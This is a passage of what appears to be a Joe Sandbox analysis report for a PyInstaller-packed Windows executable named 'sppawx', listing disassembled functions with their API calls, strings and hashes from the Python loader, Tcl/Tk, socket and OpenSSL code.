GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31596B
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315987
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315999
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159B5
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159C7

Strings

PyImport_ImportModule, xrefs: 00007FF79A315C2F, 00007FF79A315C51
PyImport_AddModule, xrefs: 00007FF79A315BD3, 00007FF79A315BF5
PyStatus_Exception, xrefs: 00007FF79A315E29, 00007FF79A315E4B
PyUnicode_FromFormat, xrefs: 00007FF79A315F3D, 00007FF79A315F5F
PyObject_SetAttrString, xrefs: 00007FF79A315D71, 00007FF79A315D93
Py_DecRef, xrefs: 00007FF79A315826, 00007FF79A315848
Py_IsInitialized, xrefs: 00007FF79A315921, 00007FF79A315943
PyErr_NormalizeException, xrefs: 00007FF79A315AED, 00007FF79A315B0F
PyObject_CallFunctionObjArgs, xrefs: 00007FF79A315D15, 00007FF79A315D37
PyObject_GetAttrString, xrefs: 00007FF79A315D43, 00007FF79A315D65
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF79A315DCD, 00007FF79A315DEF
Py_InitializeFromConfig, xrefs: 00007FF79A3158F3, 00007FF79A315915
PyObject_CallFunction, xrefs: 00007FF79A315CE7, 00007FF79A315D09
PyErr_Fetch, xrefs: 00007FF79A315ABF, 00007FF79A315AE1
PyConfig_SetWideStringList, xrefs: 00007FF79A315A63, 00007FF79A315A85
PyConfig_InitIsolatedConfig, xrefs: 00007FF79A3159AB, 00007FF79A3159CD
Failed to get address for %hs, xrefs: 00007FF79A315851
PyUnicode_Decode, xrefs: 00007FF79A315EE1, 00007FF79A315F03
PySys_SetObject, xrefs: 00007FF79A315E85, 00007FF79A315EA7
PyErr_Print, xrefs: 00007FF79A315B49, 00007FF79A315B6B
PyUnicode_Join, xrefs: 00007FF79A315F99, 00007FF79A315FBB
PyUnicode_DecodeFSDefault, xrefs: 00007FF79A315F0F, 00007FF79A315F31
PyErr_Restore, xrefs: 00007FF79A315B77, 00007FF79A315B99
PyConfig_Clear, xrefs: 00007FF79A31597D, 00007FF79A31599F
PyModule_GetDict, xrefs: 00007FF79A315CB9, 00007FF79A315CDB
PyConfig_SetString, xrefs: 00007FF79A315A35, 00007FF79A315A57
PyRun_SimpleStringFlags, xrefs: 00007FF79A315DFB, 00007FF79A315E1D
PyErr_Clear, xrefs: 00007FF79A315A91, 00007FF79A315AB3
PyObject_Str, xrefs: 00007FF79A315D9F, 00007FF79A315DC1
GetProcAddress, xrefs: 00007FF79A315858
PyMarshal_ReadObjectFromString, xrefs: 00007FF79A315C5D, 00007FF79A315C7F
PyConfig_Read, xrefs: 00007FF79A3159D9, 00007FF79A3159FB
Py_DecodeLocale, xrefs: 00007FF79A31586F, 00007FF79A315891
Py_ExitStatusException, xrefs: 00007FF79A31589A, 00007FF79A3158BC
PySys_GetObject, xrefs: 00007FF79A315E57, 00007FF79A315E79
PyUnicode_AsUTF8, xrefs: 00007FF79A315EB3, 00007FF79A315ED5
PyConfig_SetBytesString, xrefs: 00007FF79A315A07, 00007FF79A315A29
Py_Finalize, xrefs: 00007FF79A3158C5, 00007FF79A3158E7
PyEval_EvalCode, xrefs: 00007FF79A315BA5, 00007FF79A315BC7
PyMem_RawFree, xrefs: 00007FF79A315C8B, 00007FF79A315CAD
PyErr_Occurred, xrefs: 00007FF79A315B1B, 00007FF79A315B3D
PyUnicode_Replace, xrefs: 00007FF79A315FC7, 00007FF79A315FE9
PyImport_ExecCodeModule, xrefs: 00007FF79A315C01, 00007FF79A315C23
PyUnicode_FromString, xrefs: 00007FF79A315F6B, 00007FF79A315F8D
Py_PreInitialize, xrefs: 00007FF79A31594F, 00007FF79A315971

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 7774e550fba4a19efac0ed499f34c5a1cf86634025bda278acaaa905111b6cda
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: FE227D24E0FB0791FA75FF75A8582B4F2A0AF04785FC591BDD82E02660EF7CA5588360

Function 00007FF79A3176B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF79A3176C7
GetLastError.KERNEL32 ref: 00007FF79A3176D9
GetProcAddress.KERNEL32 ref: 00007FF79A317715
GetLastError.KERNEL32 ref: 00007FF79A317727
GetProcAddress.KERNEL32 ref: 00007FF79A317740
GetLastError.KERNEL32 ref: 00007FF79A317752
GetProcAddress.KERNEL32 ref: 00007FF79A31776B
GetLastError.KERNEL32 ref: 00007FF79A31777D
GetProcAddress.KERNEL32 ref: 00007FF79A317799
GetLastError.KERNEL32 ref: 00007FF79A3177AB
GetProcAddress.KERNEL32 ref: 00007FF79A3177C7
GetLastError.KERNEL32 ref: 00007FF79A3177D9
GetProcAddress.KERNEL32 ref: 00007FF79A3177F5
GetLastError.KERNEL32 ref: 00007FF79A317807
GetProcAddress.KERNEL32 ref: 00007FF79A317823
GetLastError.KERNEL32 ref: 00007FF79A317835
GetProcAddress.KERNEL32 ref: 00007FF79A317851
GetLastError.KERNEL32 ref: 00007FF79A317863

Strings

Tcl_MutexLock, xrefs: 00007FF79A3178A3, 00007FF79A3178C5
Tcl_SetVar2, xrefs: 00007FF79A317A41, 00007FF79A317A63
Tcl_MutexUnlock, xrefs: 00007FF79A3178D1, 00007FF79A3178F3
Tcl_CreateThread, xrefs: 00007FF79A317819, 00007FF79A31783B
Tcl_MutexFinalize, xrefs: 00007FF79A3178FF, 00007FF79A317921
Tcl_ConditionNotify, xrefs: 00007FF79A31795B, 00007FF79A31797D
Tk_Init, xrefs: 00007FF79A317C69, 00007FF79A317C8B
Tcl_EvalFile, xrefs: 00007FF79A317B83, 00007FF79A317BA5
Tcl_ThreadQueueEvent, xrefs: 00007FF79A3179B7, 00007FF79A3179D9
Tcl_CreateInterp, xrefs: 00007FF79A31770B, 00007FF79A31772D
Failed to get address for %hs, xrefs: 00007FF79A3176E8
Tcl_GetString, xrefs: 00007FF79A317A9D, 00007FF79A317ABF
Tcl_NewStringObj, xrefs: 00007FF79A317ACB, 00007FF79A317AED
Tcl_NewByteArrayObj, xrefs: 00007FF79A317AF9, 00007FF79A317B1B
Tcl_GetObjResult, xrefs: 00007FF79A317B55, 00007FF79A317B77
Tcl_FinalizeThread, xrefs: 00007FF79A3177BD, 00007FF79A3177DF
Tcl_ThreadAlert, xrefs: 00007FF79A3179E5, 00007FF79A317A07
Tcl_DeleteInterp, xrefs: 00007FF79A3177EB, 00007FF79A31780D
Tcl_CreateObjCommand, xrefs: 00007FF79A317A6F, 00007FF79A317A91
Tcl_EvalEx, xrefs: 00007FF79A317BB1, 00007FF79A317BD3
Tk_GetNumMainWindows, xrefs: 00007FF79A317C97, 00007FF79A317CB9
GetProcAddress, xrefs: 00007FF79A3176EF
Tcl_GetCurrentThread, xrefs: 00007FF79A317847, 00007FF79A317869
Tcl_Free, xrefs: 00007FF79A317C3B, 00007FF79A317C5D
Tcl_EvalObjv, xrefs: 00007FF79A317BDF, 00007FF79A317C01
Tcl_Init, xrefs: 00007FF79A3176C0, 00007FF79A3176DF
Tcl_ConditionWait, xrefs: 00007FF79A317989, 00007FF79A3179AB
Tcl_DoOneEvent, xrefs: 00007FF79A317761, 00007FF79A317783
Tcl_JoinThread, xrefs: 00007FF79A317875, 00007FF79A317897
Tcl_SetVar2Ex, xrefs: 00007FF79A317B27, 00007FF79A317B49
Tcl_FindExecutable, xrefs: 00007FF79A317736, 00007FF79A317758
Tcl_ConditionFinalize, xrefs: 00007FF79A31792D, 00007FF79A31794F
Tcl_Alloc, xrefs: 00007FF79A317C0D, 00007FF79A317C2F
Tcl_GetVar2, xrefs: 00007FF79A317A13, 00007FF79A317A35
Tcl_Finalize, xrefs: 00007FF79A31778F, 00007FF79A3177B1

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 91494cfba7f4e63e61bf467b69067d628a989dfdd0d1ab00133d375846eab0a8
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: CC028024E0FB0791FA75FF79A8545B4F2A1AF04795BC855BDE81E02260EF3CB5688630

Function 00007FFEDD273D80 Relevance: 33.5, APIs: 5, Strings: 14, Instructions: 247networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FFEDD274183

Strings

%s(): flowinfo must be 0-1048575., xrefs: 00007FFEDD274057
%s(): AF_HYPERV address service_id is not a valid UUID string, xrefs: 00007FFEDD273EDF
%s(): AF_INET6 address must be tuple, not %.500s, xrefs: 00007FFEDD273FAE
O&i;AF_INET address must be a pair (host, port), xrefs: 00007FFEDD2740CE
%s(): port must be 0-65535., xrefs: 00007FFEDD2740F3
%s(): bad family, xrefs: 00007FFEDD273DD1
%s(): AF_HYPERV address must be tuple, not %.500s, xrefs: 00007FFEDD273E3D
%s(): unsupported AF_HYPERV protocol: %d, xrefs: 00007FFEDD273DEE
%s(): unknown Bluetooth protocol, xrefs: 00007FFEDD273F23
%s(): AF_HYPERV address vm_id is not a valid UUID string, xrefs: 00007FFEDD273E9C
%s(): AF_INET address must be tuple, not %.500s, xrefs: 00007FFEDD2740AB
UU;AF_HYPERV address must be a str tuple (vm_id, service_id), xrefs: 00007FFEDD273E6C
O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]]), xrefs: 00007FFEDD273FDE
%s(): wrong format, xrefs: 00007FFEDD273F5B

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: htons
String ID: %s(): AF_HYPERV address must be tuple, not %.500s$%s(): AF_HYPERV address service_id is not a valid UUID string$%s(): AF_HYPERV address vm_id is not a valid UUID string$%s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): unsupported AF_HYPERV protocol: %d$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])$UU;AF_HYPERV address must be a str tuple (vm_id, service_id)
API String ID: 4207154920-3631354148
Opcode ID: ab1d2763ee5947802cd7eae6427d8dbca89c8f7812137385c8f5fa9b9c515d26
Instruction ID: bf593b8f7506cd7416f670e96402d4e0baa003a5441aa0f7f97574ffbd6fe1de
Opcode Fuzzy Hash: ab1d2763ee5947802cd7eae6427d8dbca89c8f7812137385c8f5fa9b9c515d26
Instruction Fuzzy Hash: 05C10672A08B46A6EB349F25D8401BD23A4FBC4BA8F584137DA4D57E64EF3DE549C300

Function 00007FFEDD274C10 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 172COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FFEDD274C91
FreeAddrInfoW.WS2_32 ref: 00007FFEDD274CC1
FreeAddrInfoW.WS2_32 ref: 00007FFEDD274CFE
FreeAddrInfoW.WS2_32 ref: 00007FFEDD274D28
inet_pton.WS2_32 ref: 00007FFEDD274D82
inet_pton.WS2_32 ref: 00007FFEDD274DC9
getaddrinfo.WS2_32 ref: 00007FFEDD274E0A
FreeAddrInfoW.WS2_32 ref: 00007FFEDD274E58

Strings

<broadcast>, xrefs: 00007FFEDD274D4C
address family mismatched, xrefs: 00007FFEDD274E94
255.255.255.255, xrefs: 00007FFEDD274D35
wildcard resolved to multiple address, xrefs: 00007FFEDD274D04
unsupported address family, xrefs: 00007FFEDD274CC7
unknown address family, xrefs: 00007FFEDD274E6D

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: AddrFreeInfo$getaddrinfoinet_pton
String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
API String ID: 3456548859-1715193308
Opcode ID: c268de44e144db748cae579a5c7412c2584fce12479d65216c585f58c474ea65
Instruction ID: e1fde98a8f7fcf294d53016e561c052d13eac5b926107adbc178e1bc497d7fdf
Opcode Fuzzy Hash: c268de44e144db748cae579a5c7412c2584fce12479d65216c585f58c474ea65
Instruction Fuzzy Hash: C2717F61A08782A6F7308F25944027D63A4FBC9BA4F584237DA9D53EB5EF3CE596C700

Function 00007FFEDD27781C Relevance: 24.7, APIs: 4, Strings: 10, Instructions: 162COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FFEDD27799F
htonl.WS2_32 ref: 00007FFEDD277A05
getnameinfo.WS2_32 ref: 00007FFEDD277A4D
FreeAddrInfoW.WS2_32 ref: 00007FFEDD277AE2

Strings

IPv4 sockaddr must be 2 tuple, xrefs: 00007FFEDD277A7B
surrogatepass, xrefs: 00007FFEDD277A9B
getnameinfo() argument 1 must be a tuple, xrefs: 00007FFEDD277899
socket.getnameinfo, xrefs: 00007FFEDD27791B
Oi:getnameinfo, xrefs: 00007FFEDD277868
(O), xrefs: 00007FFEDD277914
, xrefs: 00007FFEDD277A33
si|II;getnameinfo(): illegal sockaddr argument, xrefs: 00007FFEDD2778E4
sockaddr resolved to multiple addresses, xrefs: 00007FFEDD2779D4
getnameinfo(): flowinfo must be 0-1048575., xrefs: 00007FFEDD277906

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
API String ID: 4001298222-243639936
Opcode ID: c15fdad4632fc70716f215ee1c6e43032732167186f96be7e3c62b136f688b11
Instruction ID: 96bc10ef78e8ee81eb8b9cc45709ce9e7ee04cbdefe2d9888ea781bfee885ef1
Opcode Fuzzy Hash: c15fdad4632fc70716f215ee1c6e43032732167186f96be7e3c62b136f688b11
Instruction Fuzzy Hash: E7810C72A08B42A6E7308F65E8401AE77A0FBC4BA4F580137DA4D47A74EF7CE545CB40

Function 00007FF79A3181C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF79A3188A7,?,?,00000000,00007FF79A313CBB), ref: 00007FF79A31821C

Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF79A318363
\, xrefs: 00007FF79A318251
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF79A31828D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79A318230
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79A3181F3
%.*s, xrefs: 00007FF79A3182FC
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79A3182C9
CreateDirectory, xrefs: 00007FF79A31836C

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction ID: 0595ed2eb929890cbe8ae08134201a7ca7fa476e6322efb337edb24ced814a44
Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction Fuzzy Hash: 1F518111E1FA4281FB71FB31E8512BAF250EF94784FC8497DEA0E826D5EE2CE4058764

Function 00007FF79A311600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF79A311742
Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A3116A2
fwrite, xrefs: 00007FF79A3117D1
fseek, xrefs: 00007FF79A3116E1
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF79A3117CA
fread, xrefs: 00007FF79A3117E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3116DA
malloc, xrefs: 00007FF79A311749
Failed to create symbolic link %s!, xrefs: 00007FF79A311622
fopen, xrefs: 00007FF79A311663
Failed to extract %s: failed to open target file!, xrefs: 00007FF79A31165C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3117DF

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 78d74902b445e6c4b5e58c3c3c530050e7d53b8d8c6d532e78062ed4c386ea27
Instruction ID: 57a7ce00745ea4ec7df5c83e4442928506d51b162e536e70684c4233251c69a2
Opcode Fuzzy Hash: 78d74902b445e6c4b5e58c3c3c530050e7d53b8d8c6d532e78062ed4c386ea27
Instruction Fuzzy Hash: 80516861F0A64292FA20FB71A4001B9F3A0BF84798FC445BEEE1D07796EE3CE5558760

Function 00007FFEDCC05CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON

Download Yara Rule

APIs

00007FFEFBBD6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFEDCC05CD6
00007FFEFBBD6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFEDCC05D07

Strings

check_suiteb_cipher_list, xrefs: 00007FFEDCC05DA5
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFEDCC05DF3, 00007FFEDCC05E03
SUITEB128ONLY, xrefs: 00007FFEDCC05CCA
SUITEB192, xrefs: 00007FFEDCC05D59
..\s\ssl\ssl_ciph.c, xrefs: 00007FFEDCC05DB1
SUITEB128, xrefs: 00007FFEDCC05D2B
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFEDCC05DEC
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FFEDCC05E0F
SUITEB128C2, xrefs: 00007FFEDCC05CFA

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: 00007D6570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
API String ID: 2111047089-1099454403
Opcode ID: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
Instruction ID: 79e1a81a24b0ed1e1497b37f6c33c67197dcdc1d98207ceb9ce467b151fb3974
Opcode Fuzzy Hash: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
Instruction Fuzzy Hash: 1E417E32A58A0296EB108B18D95037C27A0EB44BD4F484437EB0EC3EB5DF7CE596D706

Function 00007FFEDD27481C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON

Download Yara Rule

Strings

iy#, xrefs: 00007FFEDD274871
Unknown Bluetooth protocol, xrefs: 00007FFEDD274942
OiII, xrefs: 00007FFEDD2749D3

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
